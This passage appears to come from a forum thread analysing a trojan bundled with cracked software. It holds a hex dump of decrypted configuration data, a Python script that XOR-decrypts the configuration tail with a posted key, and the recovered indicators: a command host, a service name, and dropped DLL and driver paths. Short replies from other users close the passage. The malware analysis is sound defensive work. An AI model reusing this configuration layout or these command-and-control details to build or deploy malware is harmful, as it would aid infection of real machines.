000AF370  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF380  00 00 00 00 00 00 00 00 43 3A 5C 44 4F 43 55 4D  ........C:\DOCUM
000AF390  45 7E 31 5C 67 61 74 65 73 5C 4C 4F 43 41 4C 53  E~1\gates\LOCALS
000AF3A0  7E 31 5C 54 65 6D 70 5C 59 69 65 6F 78 73 79 66  ~1\Temp\Yieoxsyf
000AF3B0  2E 74 6D 70 00 00 00 00 00 00 00 00 00 00 00 00  .tmp............
000AF3C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF3D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF3E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF3F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF400  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF410  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF420  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF430  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF440  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF450  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF460  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF470  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF480  00 00 00 00 00 00 00 00 43 3A 5C 44 4F 43 55 4D  ........C:\DOCUM
000AF490  45 7E 31 5C 67 61 74 65 73 5C 4C 4F 43 41 4C 53  E~1\gates\LOCALS
000AF4A0  7E 31 5C 54 65 6D 70 5C 59 69 65 6F 78 73 79 66  ~1\Temp\Yieoxsyf
000AF4B0  2E 64 6C 31 00 00 00 00 00 00 00 00 00 00 00 00  .dl1............
000AF4C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF4D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF4E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF4F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF500  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF510  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF520  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF530  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF540  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF550  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF560  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF570  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF580  00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4E 54  ........C:\WINNT
000AF590  5C 73 79 73 74 65 6D 33 32 5C 59 69 65 6F 78 73  \system32\Yieoxs
000AF5A0  79 66 2E 64 31 6C 00 00 00 00 00 00 00 00 00 00  yf.d1l..........
000AF5B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF5C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF5D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF5E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF5F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF600  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF610  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF620  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF630  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF640  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF650  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF660  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF670  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF680  00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4E 54  ........C:\WINNT
000AF690  5C 73 79 73 74 65 6D 33 32 5C 59 69 65 6F 78 73  \system32\Yieoxs
000AF6A0  79 66 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00  yf.dll..........
000AF6B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF6C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF6D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF6E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF6F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF700  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF710  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF720  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF730  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF740  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF750  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF760  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF770  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF780  00 00 00 00 00 00 00 00 43 3A 5C 44 4F 43 55 4D  ........C:\DOCUM
000AF790  45 7E 31 5C 67 61 74 65 73 5C 4C 4F 43 41 4C 53  E~1\gates\LOCALS
000AF7A0  7E 31 5C 54 65 6D 70 5C 59 69 65 6F 78 73 79 66  ~1\Temp\Yieoxsyf
000AF7B0  2E 6C 6F 67 00 00 00 00 00 00 00 00 00 00 00 00  .log............
000AF7C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF7D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF7E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF7F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF800  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF810  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF820  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF830  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF840  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF850  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF860  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF870  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF880  00 00 00 00 00 00 00 00                          ........
2006-12-22 11:31
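Floor 47 gives an 8-byte key and says the trailing 0x8B8 bytes of the DLL decrypt to the configuration, but not the algorithm. As an added example (not from the thread), and assuming the scheme is a repeating-key XOR over that tail (an assumption, since the post does not say), the Python below decrypts a constructed stand-in for the DLL with the posted key, scores how plausible the result looks, and pulls the NUL-terminated strings out of it the way an analyst turns a configuration block into a list of indicators. The field offsets and string values of the constructed block are copied from the decrypted dump above (block start = dump address 000AEFD0); the function names are mine.

```python
KEY = bytes.fromhex("10 20 17 10 09 55 11 EB")  # key as posted in floor 47
CONFIG_SIZE = 0x8B8                              # length of the encrypted tail as posted


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_config_tail(dll: bytes, key: bytes = KEY, size: int = CONFIG_SIZE) -> bytes:
    """Decrypt the last `size` bytes of the module (assumed repeating-key XOR)."""
    if len(dll) < size:
        raise ValueError("module is shorter than the configuration block")
    return xor_repeating(dll[-size:], key)


def plausibility(blob: bytes) -> float:
    """Share of bytes that are NUL or printable ASCII. A NUL-padded string table
    decrypted with the right key scores close to 1.0; a wrong key does not, which
    is the quick check to run before trusting a guessed key."""
    ok = sum(1 for b in blob if b == 0 or 0x20 <= b < 0x7F)
    return ok / len(blob)


def extract_strings(blob: bytes, min_len: int = 4):
    """Printable ASCII runs of at least min_len bytes, in file order."""
    out, run = [], bytearray()
    for b in blob + b"\0":          # trailing NUL flushes the last run
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode("ascii"))
        run = bytearray()
    return out


def config_indicators(dll: bytes):
    """Decrypt the tail; return its plausibility score and the strings an
    analyst would lift as indicators (host, service name, dropped paths)."""
    plain = decrypt_config_tail(dll)
    return plausibility(plain), extract_strings(plain)


def build_sample_dll() -> bytes:
    """Constructed stand-in for the dropped DLL: filler bytes followed by a
    CONFIG_SIZE block encrypted with KEY. Offsets and values come from the
    decrypted dump in floor 47; everything between the fields is NUL padding."""
    config = bytearray(CONFIG_SIZE)
    fields = {
        0x024: b"webupdate.3322.org",
        0x124: b"SHEDU",
        0x13C: b"Yieoxsyf",
        0x14C: b"C:\\Program Files\\Internet Explorer\\iexplore.exe",
        0x190: b"goldsun",
        0x2B8: b"C:\\WINNT\\system32\\drivers\\Yieoxsyf.sys",
    }
    for off, val in fields.items():
        config[off:off + len(val)] = val
    filler = bytes(range(256)) * 4   # stands in for the module's code and headers
    return filler + xor_repeating(bytes(config), KEY)


if __name__ == "__main__":
    score, strings = config_indicators(build_sample_dll())
    print(f"plausibility {score:.3f}")
    for s in strings:
        print(s)
```

On a real sample the plausibility score is the first thing to look at: with a repeating XOR key the long NUL-padded runs in a configuration block decrypt to zeros, so a correct key pushes the score near 1.0, while the encrypted tail itself scores far lower because the key bytes show through wherever the plaintext was zero.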
Floor 48

From now on, software cracked by others.... that's even less safe to use casually....
2006-12-22 12:34
Floor 49
Can't understand it; I'm here purely to learn.
Today's gain: my cold is a little better.
2006-12-22 17:11
Floor 50
It was just a prank played with a joking line, and you still managed to dig out a reply buried this deep to make an issue of it.
2006-12-23 17:06